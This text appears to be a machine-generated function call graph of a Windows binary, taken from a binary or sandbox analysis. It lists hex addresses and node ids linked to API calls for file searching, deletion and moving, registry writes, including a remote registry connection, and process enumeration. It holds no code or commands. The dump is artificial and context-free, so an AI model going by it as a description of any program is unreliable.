99150 870433 29 API calls __onexit 99139->99150 99151 870588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99139->99151 99152 86f4ed 81 API calls 99139->99152 99153 86f354 253 API calls 99139->99153 99157 85b3fe 8 API calls 99139->99157 99158 8aff4f 8 API calls 99139->99158 99140->99139 99143 85bdcc 99142->99143 99144 85bdfb 99143->99144 99161 85bf39 99143->99161 99144->99139 99146->99139 99147->99139 99148->99139 99149->99139 99150->99139 99151->99139 99152->99139 99153->99139 99154->99119 99155->99136 99156->99139 99157->99139 99158->99139 99159->99136 99160->99125 99178 85cf30 99161->99178 99163 85bf49 99164 85bf57 99163->99164 99165 8a0d59 99163->99165 99167 87016b 8 API calls 99164->99167 99187 85b3fe 8 API calls 99165->99187 99169 85bf68 99167->99169 99168 8a0d64 99170 85bf07 8 API calls 99169->99170 99171 85bf72 99170->99171 99172 85bf81 99171->99172 99173 85be6d 8 API calls 99171->99173 99174 87016b 8 API calls 99172->99174 99173->99172 99175 85bf8b 99174->99175 99186 85be0f 39 API calls 99175->99186 99177 85bfaf 99177->99144 99179 85d177 99178->99179 99184 85cf43 99178->99184 99179->99163 99181 85cfed 99181->99163 99182 85bf07 8 API calls 99182->99184 99184->99181 99184->99182 99188 8705d2 5 API calls __Init_thread_wait 99184->99188 99189 870433 29 API calls __onexit 99184->99189 99190 870588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99184->99190 99186->99177 99187->99168 99188->99184 99189->99184 99190->99184 99191 87f08e 99192 87f09a ___DestructExceptionObject 99191->99192 99193 87f0a6 99192->99193 99194 87f0bb 99192->99194 99210 87f669 20 API calls _abort 99193->99210 99204 87951d EnterCriticalSection 99194->99204 99197 87f0ab 99211 882b7c 26 API calls ___std_exception_copy 99197->99211 99198 87f0c7 99205 87f0fb 99198->99205 99202 87f0b6 __wsopen_s 99204->99198 99213 87f126 99205->99213 99207 87f108 99208 87f0d4 99207->99208 99233 87f669 20 API calls _abort 99207->99233 99212 87f0f1 LeaveCriticalSection __fread_nolock 
99208->99212 99210->99197 99211->99202 99212->99202 99214 87f134 99213->99214 99215 87f14e 99213->99215 99244 87f669 20 API calls _abort 99214->99244 99234 87dce5 99215->99234 99218 87f139 99245 882b7c 26 API calls ___std_exception_copy 99218->99245 99219 87f157 99241 889799 99219->99241 99223 87f1df 99226 87f1fc 99223->99226 99232 87f20e 99223->99232 99224 87f25b 99225 87f268 99224->99225 99224->99232 99247 87f669 20 API calls _abort 99225->99247 99246 87f43f 31 API calls 4 library calls 99226->99246 99229 87f206 99230 87f144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 99229->99230 99230->99207 99232->99230 99248 87f2bb 30 API calls 2 library calls 99232->99248 99233->99208 99235 87dd06 99234->99235 99236 87dcf1 99234->99236 99235->99219 99249 87f669 20 API calls _abort 99236->99249 99238 87dcf6 99250 882b7c 26 API calls ___std_exception_copy 99238->99250 99240 87dd01 99240->99219 99251 889616 99241->99251 99243 87f173 99243->99223 99243->99224 99243->99230 99244->99218 99245->99230 99246->99229 99247->99230 99248->99230 99249->99238 99250->99240 99252 889622 ___DestructExceptionObject 99251->99252 99253 88962a 99252->99253 99254 889642 99252->99254 99286 87f656 20 API calls _abort 99253->99286 99256 8896f6 99254->99256 99260 88967a 99254->99260 99291 87f656 20 API calls _abort 99256->99291 99257 88962f 99287 87f669 20 API calls _abort 99257->99287 99276 8854d7 EnterCriticalSection 99260->99276 99261 8896fb 99292 87f669 20 API calls _abort 99261->99292 99264 889680 99266 8896b9 99264->99266 99267 8896a4 99264->99267 99265 889703 99293 882b7c 26 API calls ___std_exception_copy 99265->99293 99277 88971b 99266->99277 99288 87f669 20 API calls _abort 99267->99288 99269 889637 __wsopen_s 99269->99243 99272 8896b4 99290 8896ee LeaveCriticalSection __wsopen_s 99272->99290 99273 8896a9 99289 87f656 20 API calls _abort 99273->99289 99276->99264 99294 885754 99277->99294 99279 88972d 99280 889735 99279->99280 99281 889746 SetFilePointerEx 99279->99281 99307 87f669 20 API 
calls _abort 99280->99307 99283 88975e GetLastError 99281->99283 99285 88973a 99281->99285 99308 87f633 20 API calls 2 library calls 99283->99308 99285->99272 99286->99257 99287->99269 99288->99273 99289->99272 99290->99269 99291->99261 99292->99265 99293->99269 99295 885761 99294->99295 99296 885776 99294->99296 99309 87f656 20 API calls _abort 99295->99309 99302 88579b 99296->99302 99311 87f656 20 API calls _abort 99296->99311 99299 885766 99310 87f669 20 API calls _abort 99299->99310 99300 8857a6 99312 87f669 20 API calls _abort 99300->99312 99302->99279 99304 88576e 99304->99279 99305 8857ae 99313 882b7c 26 API calls ___std_exception_copy 99305->99313 99307->99285 99308->99285 99309->99299 99310->99304 99311->99300 99312->99305 99313->99304 99314 860e6f 99315 860e83 99314->99315 99321 8613d5 99314->99321 99316 860e95 99315->99316 99319 87016b 8 API calls 99315->99319 99317 8a55d0 99316->99317 99320 860eee 99316->99320 99415 85b3fe 8 API calls 99316->99415 99416 8c1a29 8 API calls 99317->99416 99319->99316 99329 86044d ISource 99320->99329 99347 862ad0 99320->99347 99321->99316 99324 85be6d 8 API calls 99321->99324 99324->99316 99325 8a62cf 99420 8c3ef6 81 API calls __wsopen_s 99325->99420 99326 87016b 8 API calls 99331 860326 ISource 99326->99331 99327 861e00 40 API calls 99327->99331 99328 861645 99328->99329 99335 85be6d 8 API calls 99328->99335 99331->99325 99331->99326 99331->99327 99331->99328 99331->99329 99332 8a5c7f 99331->99332 99333 8a61fe 99331->99333 99334 85be6d 8 API calls 99331->99334 99340 8705d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99331->99340 99341 85bf07 8 API calls 99331->99341 99342 8a60b9 99331->99342 99343 860a5e ISource 99331->99343 99344 870588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 99331->99344 99346 870433 29 API calls pre_c_initialization 99331->99346 99414 861940 253 API calls 2 library calls 99331->99414 99332->99329 
99339 85be6d 8 API calls 99332->99339 99419 8c3ef6 81 API calls __wsopen_s 99333->99419 99334->99331 99335->99329 99339->99329 99340->99331 99341->99331 99417 8c3ef6 81 API calls __wsopen_s 99342->99417 99418 8c3ef6 81 API calls __wsopen_s 99343->99418 99344->99331 99346->99331 99348 862b36 99347->99348 99349 862f70 99347->99349 99350 8a7b7c 99348->99350 99351 862b50 99348->99351 99750 8705d2 5 API calls __Init_thread_wait 99349->99750 99761 8d79f9 253 API calls 99350->99761 99354 8630e0 9 API calls 99351->99354 99353 862f7a 99356 862fbb 99353->99356 99751 85b25f 99353->99751 99357 862b60 99354->99357 99363 8a7b91 99356->99363 99364 862fec 99356->99364 99360 8630e0 9 API calls 99357->99360 99358 8a7b88 99358->99331 99361 862b76 99360->99361 99361->99356 99362 862bac 99361->99362 99362->99363 99388 862bc8 __fread_nolock 99362->99388 99762 8c3ef6 81 API calls __wsopen_s 99363->99762 99758 85b3fe 8 API calls 99364->99758 99367 862ff9 99759 86e662 253 API calls 99367->99759 99368 862f94 99757 870588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99368->99757 99371 8a7bb9 99763 8c3ef6 81 API calls __wsopen_s 99371->99763 99373 862cef 99374 8a7c1c 99373->99374 99375 862cfc 99373->99375 99765 8d60a2 53 API calls _wcslen 99374->99765 99376 8630e0 9 API calls 99375->99376 99378 862d09 99376->99378 99382 8630e0 9 API calls 99378->99382 99389 862d87 ISource 99378->99389 99379 87016b 8 API calls 99379->99388 99380 87019b 8 API calls 99380->99388 99381 863032 99760 86fe59 8 API calls 99381->99760 99393 862d23 99382->99393 99384 862edd 99384->99331 99385 86306d 99385->99331 99387 8602f0 253 API calls 99387->99388 99388->99367 99388->99371 99388->99373 99388->99379 99388->99380 99388->99387 99388->99389 99390 8a7bfd 99388->99390 99389->99381 99391 8630e0 9 API calls 99389->99391 99395 862e3b ISource 99389->99395 99421 8c276a 99389->99421 99425 8c65b4 99389->99425 99430 8c4ad5 99389->99430 99435 8be9c5 GetFileAttributesW 99389->99435 99437 8c5ed5 99389->99437 99467 
8c6d2d 99389->99467 99480 8c874a 99389->99480 99507 8c95f6 99389->99507 99522 8c6561 99389->99522 99529 86be75 99389->99529 99586 8dcd16 99389->99586 99675 8dac49 99389->99675 99680 8deb63 99389->99680 99716 857953 99389->99716 99720 8d9eea 99389->99720 99723 8c8e39 99389->99723 99742 86f95e 99389->99742 99766 8c3ef6 81 API calls __wsopen_s 99389->99766 99764 8c3ef6 81 API calls __wsopen_s 99390->99764 99391->99389 99393->99389 99396 85be6d 8 API calls 99393->99396 99395->99384 99749 86e29c 8 API calls ISource 99395->99749 99396->99389 99414->99331 99415->99316 99416->99329 99417->99343 99418->99329 99419->99329 99420->99329 99422 8c2778 99421->99422 99423 8c2773 99421->99423 99422->99389 99767 8c183b 99423->99767 99792 858e70 99425->99792 99429 8c65d1 99429->99389 99431 858e70 52 API calls 99430->99431 99432 8c4ae8 99431->99432 99824 8bda81 99432->99824 99434 8c4af0 99434->99389 99436 8be9d1 99435->99436 99436->99389 99438 8c5fbd 99437->99438 99439 8c5ef4 99437->99439 99441 858e70 52 API calls 99438->99441 99451 8c6011 99438->99451 99883 85c92d 99439->99883 99443 8c5fef 99441->99443 99442 8c5eff 99444 85c92d 39 API calls 99442->99444 99445 858e70 52 API calls 99443->99445 99446 8c5f15 99444->99446 99447 8c6001 99445->99447 99446->99438 99448 85bf07 8 API calls 99446->99448 99840 8bd836 99447->99840 99450 8c5f26 99448->99450 99452 85bf07 8 API calls 99450->99452 99451->99389 99453 8c5f2f 99452->99453 99454 858e70 52 API calls 99453->99454 99455 8c5f3c 99454->99455 99888 85694e 99455->99888 99457 8c5f4f 99930 857af4 99457->99930 99461 85c92d 39 API calls 99461->99438 99463 85b25f 8 API calls 99464 8c5f80 99463->99464 99465 8bda81 12 API calls 99464->99465 99466 8c5f89 99465->99466 99466->99461 99468 858e70 52 API calls 99467->99468 99469 8c6d47 99468->99469 99470 8c6d84 99469->99470 99471 85c92d 39 API calls 99469->99471 100086 8be783 99470->100086 99473 8c6d76 99471->99473 99473->99470 99476 85557e 9 API calls 99473->99476 99474 8c6d92 100091 857a59 99474->100091 
99476->99470 99478 858e70 52 API calls 99478->99474 99479 8c6dd7 99479->99389 99481 8c875a __wsopen_s 99480->99481 99482 858e70 52 API calls 99481->99482 99483 8c877b 99482->99483 99484 85c92d 39 API calls 99483->99484 99491 8c8799 99483->99491 99484->99491 99485 858e70 52 API calls 99486 8c887c 99485->99486 99487 85557e 9 API calls 99486->99487 99488 8c88a7 99487->99488 100097 87d913 99488->100097 99490 8c88cd 99492 8c88f7 GetCurrentDirectoryW SetCurrentDirectoryW 99490->99492 99491->99485 99496 8c8973 99491->99496 99493 8c8921 99492->99493 99492->99496 99494 8be387 4 API calls 99493->99494 99495 8c892a 99494->99495 99495->99496 99497 8be9c5 GetFileAttributesW 99495->99497 99496->99389 99498 8c8938 99497->99498 99499 8c89cb 99498->99499 99500 8c8940 GetFileAttributesW SetFileAttributesW 99498->99500 100100 8c9f9f FindFirstFileW 99499->100100 99501 8c8969 SetCurrentDirectoryW 99500->99501 99502 8c89b1 99500->99502 99501->99496 99504 8c89b5 SetCurrentDirectoryW 99502->99504 99505 8c8a02 SetCurrentDirectoryW 99502->99505 99504->99499 99505->99496 99506 8c89ea 99506->99505 99508 85bf07 8 API calls 99507->99508 99509 8c9607 99508->99509 99510 858e70 52 API calls 99509->99510 99511 8c9616 99510->99511 99512 85557e 9 API calls 99511->99512 99513 8c9621 99512->99513 99514 858e70 52 API calls 99513->99514 99515 8c962e 99514->99515 99516 858e70 52 API calls 99515->99516 99517 8c9640 99516->99517 99518 858e70 52 API calls 99517->99518 99519 8c9655 WritePrivateProfileStringW 99518->99519 99520 8c966b WritePrivateProfileStringW 99519->99520 99521 8c9677 99519->99521 99520->99521 99521->99389 99523 858e70 52 API calls 99522->99523 99524 8c6577 99523->99524 100144 8bdb69 99524->100144 99526 8c657f 99527 8c6583 GetLastError 99526->99527 99528 8c6598 99526->99528 99527->99528 99528->99389 100169 856ab6 99529->100169 99533 87016b 8 API calls 99534 86bea6 99533->99534 99535 87019b 8 API calls 99534->99535 99537 86beb7 99535->99537 99536 8a8f7a 99539 86bf1f 99536->99539 100234 8ca607 
39 API calls 99536->100234 99538 857953 CloseHandle 99537->99538 99540 86bec2 99538->99540 99541 85c92d 39 API calls 99539->99541 99545 86bf2c 99539->99545 99542 85bf07 8 API calls 99540->99542 99543 8a8fdc 99541->99543 99544 86beca 99542->99544 99543->99545 99546 8a8fe4 99543->99546 99547 857953 CloseHandle 99544->99547 100206 86fdc9 99545->100206 99549 85c92d 39 API calls 99546->99549 99550 86bed1 99547->99550 99554 86bf33 99549->99554 99551 858e70 52 API calls 99550->99551 99552 86bedd 99551->99552 99553 857953 CloseHandle 99552->99553 99555 86bee7 99553->99555 99556 8a8ff9 99554->99556 99557 86bf4e 99554->99557 100183 856e52 99555->100183 99560 87019b 8 API calls 99556->99560 100211 857a14 99557->100211 99561 8a8ffe 99560->99561 99565 8a9012 99561->99565 100235 8541c9 99561->100235 99576 8a9016 __fread_nolock 99565->99576 100238 8c1759 8 API calls ___scrt_fastfail 99565->100238 99566 86bf00 100191 856b12 99566->100191 99567 8a8f72 100233 857923 CloseHandle ISource 99567->100233 99568 86bf65 99573 857a59 8 API calls 99568->99573 99568->99576 99577 86bf79 99573->99577 99574 86bf0e 100230 856afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 99574->100230 99580 86bfb3 99577->99580 99581 857953 CloseHandle 99577->99581 99578 8a8f3b 100232 8bd4bf SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 99578->100232 99579 86bf15 99579->99539 99579->99578 99580->99389 99583 86bfa7 99581->99583 99583->99580 100231 857923 CloseHandle ISource 99583->100231 99584 8a8f52 99584->99539 99587 85bf07 8 API calls 99586->99587 99588 8dcd39 99587->99588 99589 85bf07 8 API calls 99588->99589 99590 8dcd42 99589->99590 99591 85bf07 8 API calls 99590->99591 99592 8dcd4b 99591->99592 99593 858e70 52 API calls 99592->99593 99601 8dcdda 99592->99601 99594 8dcd71 99593->99594 100305 8dd6b1 99594->100305 99596 8dcda5 100331 8dd2f7 99596->100331 99598 8dcdd6 99599 8dce76 RegCreateKeyExW 99598->99599 99600 8dce0f RegConnectRegistryW 99598->99600 99598->99601 99603 8dcf0e 
99599->99603 99609 8dcead 99599->99609 99600->99599 99600->99601 99601->99389 99604 8dd1d6 RegCloseKey 99603->99604 99606 858e70 52 API calls 99603->99606 99604->99601 99605 8dd1e9 RegCloseKey 99604->99605 99605->99601 99607 8dcf29 99606->99607 100341 874db8 99607->100341 99609->99601 99614 8dceff RegCloseKey 99609->99614 99610 8dcf38 99611 8dcf44 99610->99611 99612 8dcf96 99610->99612 99613 858e70 52 API calls 99611->99613 99615 858e70 52 API calls 99612->99615 99616 8dcf4e _wcslen 99613->99616 99614->99601 99617 8dcfa0 99615->99617 99620 858e70 52 API calls 99616->99620 99618 874db8 _strftime 40 API calls 99617->99618 99619 8dcfaf 99618->99619 99621 8dcfbf 99619->99621 99622 8dd047 99619->99622 99623 8dcf70 99620->99623 99625 858e70 52 API calls 99621->99625 99624 858e70 52 API calls 99622->99624 99627 858e70 52 API calls 99623->99627 99628 8dd051 99624->99628 99626 8dcfc9 _wcslen 99625->99626 99635 858e70 52 API calls 99626->99635 99629 8dcf85 99627->99629 99630 874db8 _strftime 40 API calls 99628->99630 99632 8dd2bb RegSetValueExW 99629->99632 99631 8dd060 99630->99631 99633 8dd156 99631->99633 99632->99604 99642 8dd01f 99632->99642 99637 8dcfeb 99635->99637 99640 858e70 52 API calls 99637->99640 99642->99604 99676 858e70 52 API calls 99675->99676 99677 8dac65 99676->99677 100355 8bdc9c CreateToolhelp32Snapshot Process32FirstW 99677->100355 99679 8dac74 99679->99389 99681 85bf07 8 API calls 99680->99681 99682 8deb7a 99681->99682 99683 858e70 52 API calls 99682->99683 99684 8deb89 99683->99684 99685 857a14 8 API calls 99684->99685 99686 8deb9c 99685->99686 99687 858e70 52 API calls 99686->99687 99688 8deba9 99687->99688 99689 8dec26 99688->99689 99690 8debc1 99688->99690 99691 858e70 52 API calls 99689->99691 99692 85c92d 39 API calls 99690->99692 99693 8dec2b 99691->99693 99694 8debc6 99692->99694 99695 8dec38 99693->99695 99696 8dec73 99693->99696 99694->99695 99699 8debdf 99694->99699 99698 856ab6 8 API calls 99695->99698 99697 8dec8b 99696->99697 99701 
85c92d 39 API calls 99696->99701 99702 8deca4 99697->99702 99704 85c92d 39 API calls 99697->99704 99713 8dec45 99698->99713 99700 858685 8 API calls 99699->99700 99703 8debec 99700->99703 99701->99697 99705 85be6d 8 API calls 99702->99705 99706 857af4 8 API calls 99703->99706 99704->99702 99707 8decbe 99705->99707 99708 8debfa 99706->99708 100373 8b9b57 99707->100373 99710 858685 8 API calls 99708->99710 99712 8dec13 99710->99712 99711 8dec21 99715 857a59 8 API calls 99711->99715 99714 857af4 8 API calls 99712->99714 99713->99389 99714->99711 99715->99713 99717 85795d 99716->99717 99718 85796c 99716->99718 99717->99389 99718->99717 99719 857971 CloseHandle 99718->99719 99719->99717 100399 8d88b6 99720->100399 99722 8d9efa 99722->99389 99724 85bf07 8 API calls 99723->99724 99725 8c8e4a 99724->99725 99726 87019b 8 API calls 99725->99726 99727 8c8e54 99726->99727 99728 8541a6 8 API calls 99727->99728 99729 8c8e5e 99728->99729 99730 858e70 52 API calls 99729->99730 99731 8c8e6d 99730->99731 99732 85557e 9 API calls 99731->99732 99733 8c8e78 99732->99733 99734 858e70 52 API calls 99733->99734 99735 8c8e85 99734->99735 99736 858e70 52 API calls 99735->99736 99737 8c8e97 99736->99737 99738 858e70 52 API calls 99737->99738 99739 8c8eac GetPrivateProfileStringW 99738->99739 99740 856ab6 8 API calls 99739->99740 99741 8c8ecf ISource 99740->99741 99741->99389 99743 85c92d 39 API calls 99742->99743 99744 86f972 99743->99744 99745 8afac0 Sleep 99744->99745 99746 86f97a timeGetTime 99744->99746 99747 85c92d 39 API calls 99746->99747 99748 86f990 99747->99748 99748->99389 99749->99395 99750->99353 99752 85b26e _wcslen 99751->99752 99753 87019b 8 API calls 99752->99753 99754 85b296 __fread_nolock 99753->99754 99755 87016b 8 API calls 99754->99755 99756 85b2ac 99755->99756 99756->99368 99757->99356 99758->99367 99759->99381 99760->99385 99761->99358 99762->99389 99763->99389 99764->99389 99765->99393 99766->99389 99768 8c1852 99767->99768 99783 8c196b 99767->99783 99769 8c1872 
99768->99769 99770 8c189f 99768->99770 99772 8c18b6 99768->99772 99769->99770 99774 8c1886 99769->99774 99771 87019b 8 API calls 99770->99771 99776 8c1894 __fread_nolock 99771->99776 99773 87019b 8 API calls 99772->99773 99784 8c18d3 99772->99784 99773->99784 99777 87019b 8 API calls 99774->99777 99775 8c18fa 99778 87019b 8 API calls 99775->99778 99779 87016b 8 API calls 99776->99779 99777->99776 99780 8c1900 99778->99780 99779->99783 99786 86c1f1 99780->99786 99783->99422 99784->99774 99784->99775 99784->99776 99787 87019b 8 API calls 99786->99787 99788 86c208 99787->99788 99789 87016b 8 API calls 99788->99789 99790 86c214 99789->99790 99791 86f9e2 10 API calls 99790->99791 99791->99776 99793 858e85 99792->99793 99794 858e82 99792->99794 99795 858e8d 99793->99795 99796 858ebb 99793->99796 99815 8be387 lstrlenW 99794->99815 99820 875556 26 API calls 99795->99820 99798 896b10 99796->99798 99801 858ecd 99796->99801 99806 896a29 99796->99806 99823 875513 26 API calls 99798->99823 99799 858e9d 99805 87016b 8 API calls 99799->99805 99821 86fe8f 51 API calls 99801->99821 99802 896b28 99802->99802 99807 858ea7 99805->99807 99808 896aa2 99806->99808 99810 87019b 8 API calls 99806->99810 99809 85b25f 8 API calls 99807->99809 99822 86fe8f 51 API calls 99808->99822 99809->99794 99811 896a72 99810->99811 99812 87016b 8 API calls 99811->99812 99813 896a99 99812->99813 99814 85b25f 8 API calls 99813->99814 99814->99808 99816 8be3a5 GetFileAttributesW 99815->99816 99817 8be3cf 99815->99817 99816->99817 99818 8be3b1 FindFirstFileW 99816->99818 99817->99429 99818->99817 99819 8be3c2 FindClose 99818->99819 99819->99817 99820->99799 99821->99799 99822->99798 99823->99802 99836 8579ed 99824->99836 99827 8bdaca GetLastError 99828 8bdad7 CreateDirectoryW 99827->99828 99829 8bdae5 99827->99829 99828->99829 99830 8bdae3 99828->99830 99829->99830 99831 8596d9 8 API calls 99829->99831 99830->99434 99832 8bdb27 99831->99832 99833 8bda81 8 API calls 99832->99833 99834 8bdb30 99833->99834 
99834->99830 99835 8bdb34 CreateDirectoryW 99834->99835 99835->99830 99837 8579fb 99836->99837 99838 8596d9 8 API calls 99837->99838 99839 857a0f GetFileAttributesW 99838->99839 99839->99827 99839->99830 99841 85bf07 8 API calls 99840->99841 99842 8bd853 99841->99842 99843 85bf07 8 API calls 99842->99843 99844 8bd85b 99843->99844 99845 85bf07 8 API calls 99844->99845 99846 8bd863 99845->99846 99942 85557e 99846->99942 99849 85557e 9 API calls 99850 8bd877 99849->99850 99952 8be958 99850->99952 99852 8bd882 99853 8be9c5 GetFileAttributesW 99852->99853 99854 8bd88d 99853->99854 99855 8bd89f 99854->99855 99856 8565a4 8 API calls 99854->99856 99857 8be9c5 GetFileAttributesW 99855->99857 99856->99855 99858 8bd8a7 99857->99858 99859 8bd8b4 99858->99859 99861 8565a4 8 API calls 99858->99861 99860 85bf07 8 API calls 99859->99860 99862 8bd8bc 99860->99862 99861->99859 99863 85bf07 8 API calls 99862->99863 99864 8bd8c4 99863->99864 99865 85694e 8 API calls 99864->99865 99866 8bd8d5 FindFirstFileW 99865->99866 99867 8bda23 FindClose 99866->99867 99878 8bd8f8 99866->99878 99871 8bda21 99867->99871 99868 8bd9ef FindNextFileW 99868->99878 99869 85b25f 8 API calls 99869->99878 99871->99451 99872 857af4 8 API calls 99872->99878 99874 8bdc8e 4 API calls 99874->99878 99875 8bda12 FindClose 99875->99871 99876 8bd984 99880 8bd9ad MoveFileW 99876->99880 99881 8bd99d DeleteFileW 99876->99881 100026 86e2e5 99876->100026 99878->99867 99878->99868 99878->99869 99878->99872 99878->99874 99878->99875 99878->99876 99879 8bda5c CopyFileExW 99878->99879 99882 8bd9ca DeleteFileW 99878->99882 99963 8bdf85 99878->99963 100017 8565a4 99878->100017 99879->99878 99880->99878 99881->99878 99882->99878 99884 85c93e 99883->99884 99885 85c945 99883->99885 99884->99885 100060 876661 39 API calls _strftime 99884->100060 99885->99442 99887 85c988 99887->99442 99889 85bf07 8 API calls 99888->99889 99890 856964 99889->99890 99891 85bf07 8 API calls 99890->99891 99892 85696c 99891->99892 99893 85bf07 8 API 
calls 99892->99893 99894 856974 99893->99894 99895 85bf07 8 API calls 99894->99895 99896 85697c 99895->99896 99897 8569b0 99896->99897 99898 895725 99896->99898 99900 858685 8 API calls 99897->99900 99899 85be6d 8 API calls 99898->99899 99901 89572e 99899->99901 99902 8569be 99900->99902 99903 85bceb 8 API calls 99901->99903 99904 8596d9 8 API calls 99902->99904 99908 8569f3 99903->99908 99905 8569c8 99904->99905 99906 858685 8 API calls 99905->99906 99905->99908 99910 8569e9 99906->99910 99907 856a38 100061 858685 99907->100061 99908->99907 99911 856a14 99908->99911 99916 895750 99908->99916 99913 8596d9 8 API calls 99910->99913 99911->99907 99915 85627c 8 API calls 99911->99915 99912 856a49 99914 856a5f 99912->99914 99920 85be6d 8 API calls 99912->99920 99913->99908 99917 856a73 99914->99917 99922 85be6d 8 API calls 99914->99922 99918 856a21 99915->99918 99919 8584b7 8 API calls 99916->99919 99921 856a7e 99917->99921 99924 85be6d 8 API calls 99917->99924 99918->99907 99923 858685 8 API calls 99918->99923 99926 895810 99919->99926 99920->99914 99925 85be6d 8 API calls 99921->99925 99928 856a89 99921->99928 99922->99917 99923->99907 99924->99921 99925->99928 99926->99907 99927 85627c 8 API calls 99926->99927 100074 85acc0 8 API calls __fread_nolock 99926->100074 99927->99926 99928->99457 99931 857b06 99930->99931 99932 8963b3 99930->99932 100075 857b17 99931->100075 100085 85662b 8 API calls __fread_nolock 99932->100085 99935 857b12 99935->99466 99939 8bdc8e 99935->99939 99936 8963bd 99937 85be6d 8 API calls 99936->99937 99938 8963c9 99936->99938 99937->99938 99940 8be387 4 API calls 99939->99940 99941 8bdc95 99940->99941 99941->99463 99941->99466 100032 8922f0 99942->100032 99945 8555c5 100034 85bceb 99945->100034 99946 8555aa 99947 8584b7 8 API calls 99946->99947 99949 8555b6 99947->99949 99950 8579ed 8 API calls 99949->99950 99951 8555c2 99950->99951 99951->99849 99953 85bf07 8 API calls 99952->99953 99954 8be96d 99953->99954 99955 85bf07 8 API calls 
99954->99955 99956 8be975 99955->99956 99957 85694e 8 API calls 99956->99957 99958 8be984 99957->99958 99959 85694e 8 API calls 99958->99959 99960 8be994 99959->99960 99961 86e2e5 41 API calls 99960->99961 99962 8be9a9 99961->99962 99962->99852 99964 8bdfa1 99963->99964 99965 8bdfbc 99964->99965 99966 8bdfa6 99964->99966 99967 85bf07 8 API calls 99965->99967 99968 85be6d 8 API calls 99966->99968 100016 8bdfb7 99966->100016 99969 8bdfc4 99967->99969 99968->100016 99970 85bf07 8 API calls 99969->99970 99971 8bdfcc 99970->99971 100016->99878 100018 895629 100017->100018 100019 8565bb 100017->100019 100020 87016b 8 API calls 100018->100020 100045 8565cc 100019->100045 100023 895633 _wcslen 100020->100023 100024 87019b 8 API calls 100023->100024 100025 89566c __fread_nolock 100024->100025 100027 86e2f4 CompareStringW 100026->100027 100028 8ae463 100026->100028 100030 86e319 100027->100030 100028->100030 100031 87e24b 40 API calls 100028->100031 100030->99876 100031->100028 100033 85558b GetFullPathNameW 100032->100033 100033->99945 100033->99946 100035 85bd05 100034->100035 100036 85bcf8 100034->100036 100037 87016b 8 API calls 100035->100037 100036->99949 100038 85bd0f 100037->100038 100039 87019b 8 API calls 100038->100039 100039->100036 100046 8565dc _wcslen 100045->100046 100047 89568b 100046->100047 100048 8565ef 100046->100048 100050 87016b 8 API calls 100047->100050 100055 857cb3 100048->100055 100052 895695 100050->100052 100056 857cc9 100055->100056 100059 857cc4 __fread_nolock 100055->100059 100060->99887 100062 858694 100061->100062 100063 8586f1 100061->100063 100062->100063 100064 85869f 100062->100064 100065 8596d9 8 API calls 100063->100065 100066 8966b7 100064->100066 100067 8586ba 100064->100067 100071 8586c2 __fread_nolock 100065->100071 100069 87016b 8 API calls 100066->100069 100068 858894 8 API calls 100067->100068 100068->100071 100070 8966c1 100069->100070 100072 87019b 8 API calls 100070->100072 100071->99912 100073 8966f4 100072->100073 
100074->99926 100076 857b5a __fread_nolock 100075->100076 100077 857b26 100075->100077 100076->99935 100077->100076 100078 8963e4 100077->100078 100079 857b4d 100077->100079 100080 87016b 8 API calls 100078->100080 100081 857cb3 8 API calls 100079->100081 100082 8963f3 100080->100082 100081->100076 100083 87019b 8 API calls 100082->100083 100084 896427 __fread_nolock 100083->100084 100085->99936 100087 8922f0 __wsopen_s 100086->100087 100088 8be790 GetShortPathNameW 100087->100088 100089 8584b7 8 API calls 100088->100089 100090 8be7b8 100089->100090 100090->99474 100090->99478 100092 857a9e 100091->100092 100093 857a65 100091->100093 100094 85be6d 8 API calls 100092->100094 100096 857a78 100092->100096 100095 87016b 8 API calls 100093->100095 100094->100096 100095->100096 100096->99479 100114 87d6be 100097->100114 100101 8ca03a FindClose 100100->100101 100105 8c9fc9 100100->100105 100102 8ca04b FindFirstFileW 100101->100102 100103 8ca0e2 100101->100103 100110 8ca060 100102->100110 100112 8ca0d9 FindClose 100102->100112 100103->99506 100104 8ca028 FindNextFileW 100104->100101 100104->100105 100105->100104 100108 8c9ff7 GetFileAttributesW SetFileAttributesW 100105->100108 100107 8ca0c7 FindNextFileW 100107->100110 100107->100112 100108->100105 100109 8ca0eb FindClose 100108->100109 100109->100103 100110->100107 100111 8ca0a0 SetCurrentDirectoryW 100110->100111 100110->100112 100113 8ca0c0 SetCurrentDirectoryW 100110->100113 100111->100110 100112->100103 100113->100107 100115 87d6d5 100114->100115 100116 87d89f 100114->100116 100115->100116 100121 87d740 100115->100121 100142 87f669 20 API calls _abort 100116->100142 100118 87d8af 100143 882b7c 26 API calls ___std_exception_copy 100118->100143 100120 87d774 100120->99490 100123 87d764 100121->100123 100130 87d78b 100121->100130 100137 885153 26 API calls 2 library calls 100121->100137 100122 87d7fd 100125 87d868 100122->100125 100126 87d820 100122->100126 100136 87f669 20 API calls _abort 100123->100136 100125->100120 
100125->100123 100128 87d87b 100125->100128 100126->100123 100129 87d841 100126->100129 100139 885153 26 API calls 2 library calls 100126->100139 100141 885153 26 API calls 2 library calls 100128->100141 100129->100120 100129->100123 100133 87d857 100129->100133 100130->100122 100130->100123 100138 885153 26 API calls 2 library calls 100130->100138 100140 885153 26 API calls 2 library calls 100133->100140 100136->100120 100137->100130 100138->100122 100139->100129 100140->100120 100141->100120 100142->100118 100143->100120 100145 85bf07 8 API calls 100144->100145 100146 8bdb88 100145->100146 100147 85bf07 8 API calls 100146->100147 100148 8bdb91 100147->100148 100149 85bf07 8 API calls 100148->100149 100150 8bdb9a 100149->100150 100151 85557e 9 API calls 100150->100151 100152 8bdba5 100151->100152 100153 8be9c5 GetFileAttributesW 100152->100153 100154 8bdbae 100153->100154 100155 8bdbc0 100154->100155 100156 8565a4 8 API calls 100154->100156 100157 85694e 8 API calls 100155->100157 100156->100155 100158 8bdbd4 FindFirstFileW 100157->100158 100159 8bdc60 FindClose 100158->100159 100163 8bdbf3 100158->100163 100166 8bdc6b 100159->100166 100160 8bdc3b FindNextFileW 100161 8bdc4f 100160->100161 100160->100163 